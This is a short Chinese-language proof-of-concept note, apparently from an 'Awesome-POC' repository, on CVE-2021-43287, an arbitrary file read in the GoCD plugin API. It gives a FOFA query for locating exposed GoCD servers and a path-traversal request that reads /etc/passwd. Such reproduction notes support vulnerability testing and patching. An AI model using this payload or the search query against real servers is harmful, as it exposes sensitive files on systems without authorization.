Awesome-POC/Web服务器漏洞/GoCD plugin 任意文件读取漏洞 CVE-2021-43287.md
2022-05-25 16:51:48 +08:00

33 lines
761 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# GoCD plugin 任意文件读取漏洞 CVE-2021-43287
## 漏洞描述
*GoCD*一个开源的持续集成和持续交付系统可以在持续交付过程中执行编译自动化测试自动部署等等与Jenkins类似。
GoCD plugin aip 参数中的 pluginName 参数存在任意文件读取漏洞,导致攻击者可以获取服务器中的任意敏感信息
## 漏洞影响
```
GoCD
```
## FOFA
```
title="Create a pipeline - Go"
```
## 漏洞复现
主页面
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251627593.png)
验证POC
```
/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251627131.png)